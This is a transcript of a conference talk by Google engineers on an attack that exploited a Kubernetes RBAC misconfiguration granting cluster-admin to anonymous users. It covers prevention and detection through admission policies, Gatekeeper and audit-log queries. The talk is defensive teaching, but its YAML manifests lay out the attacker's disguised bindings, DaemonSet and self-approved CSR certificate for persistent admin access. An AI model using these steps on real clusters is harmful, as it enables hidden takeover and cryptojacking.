All right, everyone, let's get started. I'm Greg, this is Vinayak, and we're from Google. We're going to talk about how crypto miners have been exploiting some RBAC misconfigurations. Whoa, that was not a good slide transition. Let's try that again. So if you were paying attention to the press back in March or April, the beginning of this year, you might have seen some headlines along these lines, about new attacks leveraging Kubernetes RBAC to backdoor clusters. We saw some of that happening on GKE, and that's what we're going to talk about today. We'll cover the root cause, which was actually a customer misconfiguration of the cluster, walk through the whole attack, do a demo of it, and talk about the prevention and detection options for that attack. I thought it might be interesting to cover a little bit of what's actually new here. We've had Kubernetes misconfigurations before: Docker ports exposed to the internet, kubelet ports on the internet, Kubernetes dashboards exposed to the internet. And there have been scanners out there targeting all of those things, so that's not really that new. The other thing that isn't really new is container-delivered crypto miners. Those have been around for quite a while now; you can find well-packaged container crypto miners on Docker Hub. The new and interesting thing here is some Kubernetes-specific hiding techniques that the attacker used, and the way they persisted. So we'll cover that in a fair amount of detail. Really quick high-level overview of the attack. The root cause here, as I said, was a customer RBAC misconfiguration that effectively gave the whole internet cluster-admin. And you might be thinking, I would never do that.
But if you're just googling for access control advice on the internet, there are definitely pages out there giving bad advice that will tell you to create exactly this binding. So it's perhaps not as unusual as you would think. The attacker was out there on the internet scanning for this kind of misconfiguration, and they found this one. They came in and created a whole bunch of different access to give themselves control of the cluster, and they also did a little bit of covering their tracks. We have Google Cloud signals that detected the crypto miner activity and alerted the customer about it, and we helped them with the investigation to figure out what was going on. Once we'd done that, we also looked at who else had made this misconfiguration, and there were a handful of other customers that had done something similar, so we notified them. And we now actually prevent it by default, which we'll talk about in more detail in just a bit. And now I'm going to hand it over to Vinayak to give you a demo. Thanks, Greg. So before we jump into the attack demo, I just wanted to cover a few Kubernetes concepts. The first one is cluster-admin. A lot of you probably know about this role, but cluster-admin is a default role that Kubernetes creates, and it grants all permissions on all resources. If you use it in a ClusterRoleBinding, you grant those permissions across every namespace, so you're essentially giving root on the cluster. We think of it as analogous to root on Linux: having these broad permissions is sometimes useful for some users doing maintenance or management, but it has to be wielded very carefully. So don't go delete it, but do make sure you're auditing who has these permissions. The other thing we wanted to talk about is some system users and groups that might be helpful to know before we go into the demo.
Here I've got a diagram of Kubernetes auth. When a request comes in, there's a set of authenticators that Kubernetes runs based on your configuration, and then three things can happen. The first is a successful request: you have a token, the token is valid, and the authenticator says, yep, this is valid. Then your identity provider, based on the authenticator you have, assigns the user, and the group is system:authenticated. That indicates that, hey, this user was authenticated, and that information gets passed on to authorization. The flip side is that you have an invalid token, so there's just a failure and you get a 401. But the third case is that you don't have any auth information at all. In that case, if anonymous auth is enabled, the anonymous authenticator is used. All it does is set the user to system:anonymous and the group to system:unauthenticated, which indicates, hey, I don't know who this person is, and they did not authenticate. But since anonymous auth is enabled, the request won't be rejected, and it gets passed down to authorization. So you might be thinking: why does system:anonymous exist, and why is it on by default in Kubernetes? Kubernetes creates a binding called system:public-info-viewer, which lets you look at health status, the cluster version, and things like that. A lot of load balancers use this. kubeadm also relies on it to share some cluster certificate information during cluster bootstrap. And finally, if you watched the demo by SIG Auth, they were also using this for checking health. So yeah, there are valid scenarios where system:anonymous and system:unauthenticated are used. And then a note on system:authenticated. A lot of you might be thinking, oh, this is fine, it's authenticated.
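For reference, this is the shape of that default discovery binding in stock Kubernetes; you can compare it against your own cluster with `kubectl get clusterrolebinding system:public-info-viewer -o yaml`:

```yaml
# Default binding shipped with Kubernetes: lets both authenticated and
# unauthenticated requests read non-sensitive endpoints (/healthz, /version, ...).
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: system:public-info-viewer
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: system:public-info-viewer
subjects:
- apiGroup: rbac.authorization.k8s.io
  kind: Group
  name: system:authenticated
- apiGroup: rbac.authorization.k8s.io
  kind: Group
  name: system:unauthenticated
```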
But based on your cluster setup or your identity provider setup, this can mean a lot of things. It can mean, hey, no one, and require some additional setup in your cloud provider. Or it could mean everyone at your company, or everyone at the identity provider you're using. In GKE, it aligns with IAM's allAuthenticatedUsers, which means anyone with a Google account. But one note: this is authentication, not authorization. Just because they can access the cluster doesn't mean they have any valid permissions in it. All right, now I'll move to the demo. Let's first look at the customer misconfiguration here. The customer created a ClusterRoleBinding where they bound cluster-admin, the super powerful role, to system:anonymous. When they create such a binding, they basically give anybody who can reach the API server unrestricted access to the cluster. And attackers are usually scanning. So now we're on the attacker machine. The attacker is running their super complicated scanning script, and they find a target. The first thing the attacker did in this cluster, based on our investigation, was create a ClusterRoleBinding, and they named it kube-controller-manager. If that name sounds familiar, it's because it's a core component of Kubernetes, so this was one of their attempts to hide in the system noise. They bound the role cluster-admin to the default service account of the kube-system namespace. Essentially, any workload that runs in the kube-system namespace and does not specify a service account gets the default service account, so in this case, any such workload will run as cluster-admin. This was another way to hide the permissions a workload might have. And then they created a workload. They named it kube-controller, they ran it in the kube-system namespace, and it was a DaemonSet.
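Sketched as manifests, the chain so far looks roughly like this. The first metadata name and the image path are hypothetical; kube-controller-manager, kube-controller, and the kube-system placement are as described in the attack:

```yaml
# The customer's misconfiguration: cluster-admin for anyone who can reach the API server.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: permissive-binding            # hypothetical name
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
- apiGroup: rbac.authorization.k8s.io
  kind: User
  name: system:anonymous
---
# The attacker's binding, named after a core component to blend into system noise.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: kube-controller-manager
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
- kind: ServiceAccount
  name: default
  namespace: kube-system
---
# The attacker's workload: no serviceAccountName, so it falls back to the
# "default" service account in kube-system and inherits cluster-admin.
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: kube-controller
  namespace: kube-system
spec:
  selector:
    matchLabels:
      app: kube-controller
  template:
    metadata:
      labels:
        app: kube-controller
    spec:
      containers:
      - name: kube-controller
        image: kuberntes/kube-controller:latest   # hypothetical look-alike image
```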
They even attempted to make the image look legitimate by almost, but not quite, spelling Kubernetes correctly. So that was another attempt to hide. And as you'll notice in the spec, there's no service account specified, so this is running as the default service account in the kube-system namespace, which means this workload is running as cluster-admin based on the binding they made. Once they have this, they have a foothold, and this workload is running their crypto miner. But they also tried to install persistence, and this was happening from within the DaemonSet now. The first thing they did was create a CSR, a CertificateSigningRequest. It's a way to ask the API server to sign a certificate that you can later use to authenticate to the API server. Let's look at this large base64 blob here. All I'm doing is extracting it from the YAML, base64 decoding it, and sending it to OpenSSL. You can see the subject here is set to CN=cluster-admin, where CN stands for common name. So anybody who presents that certificate to the API server will have their user treated as cluster-admin; they'll show up as the user cluster-admin. This is another attempt to hide. Now, once this CSR is created, somebody has to go approve it, right? Usually that's a cluster admin, but lucky for them, they already had this permission, so they could approve their own CSR. And once a CSR gets approved, there are controllers in Kubernetes that will go and sign it. So let's check if the CSR is signed. Yeah, OK, we're getting the CSR, and as you can see, it's issued. So now they can extract the certificate. And then the attacker also deleted the CSR to hide their tracks; approved CSRs are auto-deleted after a while anyway. OK, so now the attacker has an identity, right?
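The persistence step, sketched as a manifest. The object name here is hypothetical and the request blob is elided; the comment shows one way to decode the subject the way we just did:

```yaml
# Inspect the embedded PKCS#10 request with something like:
#   kubectl get csr <name> -o jsonpath='{.spec.request}' | base64 -d \
#     | openssl req -noout -subject
# For the attacker's CSR, the subject comes back as CN = cluster-admin.
apiVersion: certificates.k8s.io/v1
kind: CertificateSigningRequest
metadata:
  name: kube-controller          # hypothetical, again blending into system noise
spec:
  signerName: kubernetes.io/kube-apiserver-client
  usages:
  - client auth
  request: <base64-encoded CSR with subject CN=cluster-admin>
```

Once the CSR is approved and signed, the issued certificate shows up base64-encoded in the object's `status.certificate` field, which is where the attacker pulled it from.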
They have this user cluster-admin, but that user has no bindings. So the attacker created another binding, and in this case they bound the cluster-admin role to that cluster-admin user. Now anybody who holds the certificate has unrestricted access to the cluster. So the attacker is back on their machine, and if you check what permissions they have based on the certificate, they have all the permissions. So they're a happy crypto miner: they can access this cluster even if that initial misconfiguration has been removed. OK, cool. Some further observations from this attack. The time to exploitation was eight days, meaning that from the time the customer created the misconfiguration to the first signs of malicious activity that we noticed was eight days. What was really unique here was the attempt to blend into the system noise: creating DaemonSets with kube-controller names in the kube-system namespace, which is where customers are asked not to run their workloads because it's reserved for system workloads; using a semi-legit-looking image; and using the trick of relying on default service accounts, where if you don't look carefully at the YAML, you might miss what permissions a workload has. The payload itself was XMRig, so nothing special there. The DaemonSet was actually running some kind of script that was running kubectl commands; we could tell from the user agent. And finally, one thing we noticed was that they pushed multiple image updates to the DaemonSet. In the past we've usually seen people updating their payload in place, but they actually relied on Kubernetes Deployments and DaemonSets to roll out payload updates. That was very unique about this attack. And with that, I've covered the attack portion, so I'm going to hand it to Greg to cover prevention and detection. OK, let's talk about prevention.
If we think about the misconfiguration surface here, we demoed that first one in detail, the system:anonymous misconfiguration. You could do basically the same thing with system:unauthenticated. So system:anonymous is a user and system:unauthenticated is a group, but they're basically the same anyone-on-the-internet kind of thing. And then there's also system:authenticated, which we talked about, and which varies depending on your configuration. So there are three different principals here, and two different places you can bind those permissions, at the cluster level and the namespace level. That's six different combinations of possible things you might need to worry about. We wrote them all out; there's a link here to the GitHub repo where all the demo code is, and you can see exactly all that YAML. When we're thinking about prevention, we want to cover this whole group of misconfigurations if possible. Here's the big list of prevention options; we're going to step through each one and talk about it in some detail. The first, most obvious one: this was an internet-exposed API server. If it wasn't network reachable, then this wouldn't have been a problem, or it would have been a smaller problem; rather than everyone on the internet, it's only everyone who can actually get to the API server. And if you're thinking about limiting network access to the API server, there are some other advantages, other reasons why it's a good thing to have. There's some denial-of-service protection, and you might get some protection from other authentication or authorization misconfigurations, or just vulnerabilities in the API server. There are a couple of different ways you can do that, and you can do both of them: you can run in a private address space that's not routable, and you can put a firewall in front of it. On GKE, we let you do both of those things, and most other managed providers do the same.
Second one, let's talk about anonymous auth. If we look at what the CIS Kubernetes Benchmark says about anonymous authentication, it says it's generally reasonable to allow anonymous access if you're using it for health checks and discovery. Those are the load balancer and similar use cases we talked about before. This setting is true by default: `--anonymous-auth=true`. You can set it to false if you have control of the API server flags; if you're using a managed Kubernetes provider, you might not have that control, and you don't have it on GKE. I think there's more we can do here to make this a safer default, and we've actually got it on the agenda for SIG Auth. So if you're looking at this slide and thinking, hey, I wish that was better, and we could restrict this access without breaking stuff, then we think the same, and we should go talk about it and figure out how to make this a safer default. Moving on, assuming that anonymous auth is on, you can make some of those bindings. The thing we saw in this attack was binding cluster-admin specifically to one of these three groups or users, and you can prevent that with admission. It's pretty easy to do with an admission controller, and there's a bunch of them listed here. You could use Gatekeeper or Kyverno, or you could use the new beta ValidatingAdmissionPolicy feature that's being built into Kubernetes now, which doesn't even require you to run a separate admission webhook. That would block these bindings from being created, and we're going to demo that. On GKE, we just outright prevent it, because there's really no good reason to be binding cluster-admin to these particular principals; they're kind of dangerous. So on GKE, as of 1.28, this is just blocked outright. You could go a little further. That was just cluster-admin bound to those users and groups, so we looked into what people are doing with these users and groups more broadly.
And there are a few different things. We've already talked about load balancers and health checking and that kind of stuff. kubeadm uses it as part of its bootstrapping. Rancher uses it as a very limited pre-auth API that they expose, and Bitnami has a similar thing where they expose a very limited subset of functionality just to get the system up and running. So if you block any binding to these principals, there are a few things you might run into. We also saw people using these for CI/CD metrics, to feed metrics to a dashboard without that dashboard having to handle authentication. And there are a lot of pod security policy bindings to system:authenticated, but that's kind of end of life now anyway; the last version that supports pod security policies is now end of life, so you probably don't need to worry about that one too much. I think this is generally reasonably safe to do; these are smaller use cases that may not actually affect you. And you can do this with admission too, and we'll do that in the demo as well. So we talked about a few different combinations there: cluster-admin to these groups. What about bindings that involve cluster-admin generally? That's a category we might want to worry about. And again, the CIS Benchmark here says, hey, you should probably be careful with cluster-admin. It's like the root of Kubernetes, so be careful who you give it to. It is fairly widely used, both by humans, probably where it shouldn't be, and also by system components. So you can sort of block this, but I'd tread fairly carefully. On GKE, we have a policy controller, a managed policy you can enforce, that lets the pieces of GKE that need this keep working without breaking GKE. If you're going to do this on a managed platform, or a platform where you don't have full control, you just need to carefully work through that. But it's possible to add restrictions here.
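Before the demo, here's a rough sketch of the ValidatingAdmissionPolicy route mentioned earlier, assuming the beta API available in 1.28. The names and the CEL expression here are our own illustration, not the exact policy from the talk or from GKE:

```yaml
apiVersion: admissionregistration.k8s.io/v1beta1
kind: ValidatingAdmissionPolicy
metadata:
  name: deny-cluster-admin-broad-subjects     # hypothetical name
spec:
  failurePolicy: Fail
  matchConstraints:
    resourceRules:
    - apiGroups: ["rbac.authorization.k8s.io"]
      apiVersions: ["v1"]
      operations: ["CREATE", "UPDATE"]
      resources: ["clusterrolebindings", "rolebindings"]
  validations:
  # Reject any binding of cluster-admin to the three broad principals.
  - expression: >-
      object.roleRef.name != 'cluster-admin' ||
      !has(object.subjects) ||
      !object.subjects.exists(s, s.name in
        ['system:anonymous', 'system:unauthenticated', 'system:authenticated'])
    message: "cluster-admin may not be bound to system:anonymous, system:unauthenticated, or system:authenticated"
---
apiVersion: admissionregistration.k8s.io/v1beta1
kind: ValidatingAdmissionPolicyBinding
metadata:
  name: deny-cluster-admin-broad-subjects-binding
spec:
  policyName: deny-cluster-admin-broad-subjects
  validationActions: [Deny]
```

You'd extend the subject list or the roleRef check if you also wanted to catch custom star-star roles, which we'll come back to under detection.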
So let's demo some of that. The first thing we're going to do is try to grab the secrets out of the cluster. We're completely unauthenticated to this cluster; we're coming at it from the internet, so we're not expecting this to work. You can see here this access is forbidden: the user is system:anonymous, and we don't have access to get secrets in this cluster. That's working as intended; we get a 403. If we look at the binding we're going to add to this cluster, it's the same one Vinayak talked about: system:anonymous to cluster-admin. We put that on the cluster, and then we try the same thing again. To avoid a giant blob of text on the screen, I'm just going to summarize the output with jq. And you can see now this works. So we broke the cluster: we granted that access, and now anyone on the internet can come along and get our secrets. That's bad, and we don't want it to be like that. So we'll delete that role binding again, and now we're going to install Gatekeeper. Gatekeeper is an open source admission controller, and it's going to help prevent those bindings from getting created in the first place. Gatekeeper requires a constraint template and a constraint, so what we're doing here is adding those two things. We're using the disallow-anonymous constraint template and constraint from the Gatekeeper library to prevent those bindings from being created. And we'll try making that binding again. We get an error from Gatekeeper saying, hey, that's not allowed: the unauthenticated user reference is not allowed in this role binding. That's great; that's how we want things to be. I mentioned that on GKE we're blocking this by default. So on GKE 1.28, we'll just create a cluster there and try the same thing, making the binding. We don't have to install any admission controllers or do any other configuration.
It's just going to be blocked outright. GKE Warden is the built-in admission that GKE has, and it's saying, yeah, you can't bind cluster-admin to system:anonymous. So that's prevention; let's talk about detection. There are three different categories here. We can talk about detecting the misconfiguration, the thing we did wrong to start with; we can talk about what the attacker did on the cluster, the actual exploitation; and we can talk about the payload itself. We'll cover those three categories. Logs are really great here; we can find a bunch of stuff in logs. There are three different things we could look for. We can look for exactly that cluster-admin-to-system-users-or-groups binding happening, and if that's happening, that's really bad. That's the thing we're preventing by default on GKE, but if you're going to take a detect-only strategy, you definitely want to detect this one. The second is any binding to those big groups or users; those may or may not be bad, and we talked about a couple of use cases where they might be intended. And then the probably more noisy, more common case: bindings to cluster-admin generally. You can find all this stuff happening in the logs, and we've got a bunch of log queries in the slides, so if you want to build this kind of detection yourself, you can go do it. We also wrote a little script that will audit your existing role bindings and tell you if you've got exactly this problem: bindings that shouldn't be bound to these system users and groups. On GKE, this is done for you with Event Threat Detection; it looks at the logs and notifies you about this stuff. We're just going to show that quickly. This is our Security Command Center UI. You can see we've got a couple of high-priority findings here, and this critical one is the privilege escalation.
So as we were beating up that cluster, misconfiguring it like crazy, Event Threat Detection was in the background looking at the logs. It found a bunch of other stuff here too, some lower-severity findings, but there's this critical one that relates to these RBAC bindings. We get a description, we get the user that created it and the time, all the stuff you'd expect here. And if we scroll right down, we get a link to the actual log, so we can go look at the details of the log itself and see all the information about what happened: who did this, where did they come from, and what did they do. You can see here cluster-admin being bound to system:anonymous. As I said, that's the Google version, but there are queries in the deck to help you write your own similar detection. OK, so, unused permissions. cluster-admin isn't the only privileged role out there. You can just make your own, and you can make your own mistakes with your own cluster-admin. You could make a new role that's star-star, just like cluster-admin, and go bind it to a bunch of things that shouldn't have that access. So this is a more general least-privilege permissions problem that you need to think about and potentially solve. In terms of open source tools, there's not a whole lot in this area that will help you with the general case. There's a tool from Palo Alto called rbac-police that can tell you about some privileged roles, but it won't tell you if they're in use or how over-permissioned they are. It'll just let you know, hey, these things look like they might be over-permissioned, and you can't tell if they're actually being used. There are a bunch of third-party tools, and a bunch of vendors on the KubeCon floor, that will sell you tools that tell you whether the permissions you've granted are being used. So there are ways to detect this today. On GKE, we have IAM Recommender, which covers this for IAM.
So if you do your bindings through IAM, we'll be able to say, hey, six out of ten of these permissions aren't actually being used regularly, so you could probably slim this role down and get it closer to least privilege. That's really the sort of recommendation we're looking for here; we're not covering RBAC just yet. So that was the first category, detecting the misconfiguration. Now for the second category, exploitation detection: what did the attacker actually do on this cluster? We can look at system:anonymous activity. It's pretty simple: if anonymous activity is actually authorized, that's probably bad, so it's a reasonable signal on its own. We can look at the certificate creation work the attacker was doing. There is a little bit of system use of the CSR API, so depending on which provider you're using and what your own organization is doing with that Kubernetes API, there might be more noise in this signal. Here I've filtered out just the stuff that GKE does with certificates, and you might have to do similar things. For example, we issue certificates to the kubelet using this mechanism, so you have to filter those out if you don't want noise in this signal. And then the third thing, a pretty common security problem in the industry: detecting crypto miners. You can find a lot of vendors that will do this for you, I'm sure. The typical techniques: bad IPs, bad domains, the containers themselves, the binaries in those containers. And on GKE, we've got a whole bunch of crypto mining detection you can turn on. We have Event Threat Detection looking at logs. And if you actually opt in and ask us to do it, we can scan the memory of the VM from outside the hypervisor; that's what VM Threat Detection does. So we can actually find a crypto miner that's running in memory without having an agent.
I think that's a pretty cool capability. So, just summing up: we had this pretty interesting Kubernetes-specific attack. In terms of prevention options, we talked about limiting access to the API server, and then there's a bunch of stuff you can do at the RBAC level to prevent those bindings from happening, or at least detect them if you're not going to prevent them. On the detection side, there are also a bunch of strategies, and you should audit what you've already got. If you put detection in place today, that covers you from this point onwards, but you want to look at what you already have as well, so there's definitely an auditing part of this that you need to remember to do if you don't have anything today. Overall, though, this was a pretty good news story. Yes, there was a compromise; yes, a bad guy was operating in there. But we were able to detect it, we were able to prevent it for everyone else operating on GKE, and then also share that knowledge with the community, and hopefully others will be able to build similar prevention and protect everyone by default. There's a whole bunch of links here; all the demo code is up on GitHub. You can give us feedback through this QR code, which will also get you to the slides. And at the back of the deck, we've got some more detection log queries if you want to go build that detection yourself. So I'm happy to take any questions. There are a couple of mics, one here and one there, if folks have questions. Thanks for the talk, really cool. So for that affected customer, did you have to rotate their cert after everything was cleaned up? Yeah, so we gave them some advice about cleanup. When you have a compromise like this, where an attacker has cluster-admin, it's kind of burn it down; there's not really any coming back from that.
So they were running their own incident response process, but yes, burn the whole cluster down is basically the advice, because they've had complete control in there. And then you also need to look at the trust relationships that cluster had: were there secrets in there that give access to other systems? You have to think about those trust relationships as well. Right, that makes sense. So even if you delete the cluster role binding, if they still have that certificate, then they essentially always have a way in, right? Yeah. If you just delete the ClusterRoleBinding that was the misconfiguration, so if you were like, oh, I see anonymous was doing stuff, and I went and looked at what anonymous did, and anonymous created this role binding, so I'm going to clean that up and get rid of that role binding, that's not enough, because they've created this separate certificate that gives them access even after you've cleaned up the misconfiguration that was the entry point. Right, I guess my question is: inside that certificate, it said the common name was cluster-admin, but even if you delete everything within your cluster that gives any semantics to cluster-admin, with that cert they could still essentially get any access they want. So the certificate is for the cluster; the CA that issued it is the cluster's CA. So if that cluster is gone, that's the end of the access. OK, thanks. Thanks for the talk. Do you see RBAC compromises across cluster and, like, GKE or Google roles as well? I'm curious how those two work together. Across cluster? So I guess I mean, Google has federation, where service accounts are federated with Kubernetes and vice versa. Do you see people hopping between a Google role, then a GKE role, and then back to Google resources? Right, yeah.
So just generally, when we think about attacks: if someone is able to operate inside a pod that has a Kubernetes service account attached, then they have whatever privileges that service account has. And if you've used Workload Identity or something similar to map that Kubernetes service account to a Google service account, then they also have whatever privileges that Google service account has, whether that's reading out of a certain bucket, publishing to a Pub/Sub topic, or whatever it is. We haven't seen attackers be workload-identity aware like that and go after the Google resources, but once you have that compromise, there's no reason they wouldn't have that access if that's the area that's been compromised. Awesome talk. I didn't even know about the system:anonymous stuff; that's crazy. Do you have an opinion on that being on by default? I know you mentioned you were going to put it on the agenda for SIG Auth. What are your thoughts? Yeah, I think it's been the default for a while now, and it has a bunch of dependencies; we talked about a few of them. So I think we need to tread fairly carefully there. But it would be great if there was a third option that allowed the discovery role to work but didn't let anyone bind anything else to these principals, so there's not a sharp edge there anymore. That's the sort of thing we're going to go discuss in SIG Auth: can we keep discovery working, and not break the quite large number of things that depend on it, but also remove this sharp edge where people can bind stuff to these principals when they probably shouldn't? Awesome, thank you. Yeah, thank you for the talk, it's great. Wondering if you're going to suggest that other cloud providers adopt something similar, in terms of disallowing this by default?
Yeah, part of sharing here is definitely bringing awareness, and I talk to the security leads of other cloud providers pretty regularly; I talked to them yesterday about this subject. So we'll see. All right, thanks a lot.
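As a flavor of the detection queries in the back of the deck: a starting-point Cloud Logging filter for the critical case, a binding of cluster-admin to one of the broad subjects, might look like the sketch below. The field paths follow the GKE admin activity audit log format, but treat them as assumptions to verify against your own logs:

```
resource.type="k8s_cluster"
protoPayload.methodName=~"io.k8s.authorization.rbac.v1.clusterrolebindings.(create|update|patch)"
protoPayload.request.roleRef.name="cluster-admin"
(protoPayload.request.subjects.name="system:anonymous" OR
 protoPayload.request.subjects.name="system:unauthenticated" OR
 protoPayload.request.subjects.name="system:authenticated")
```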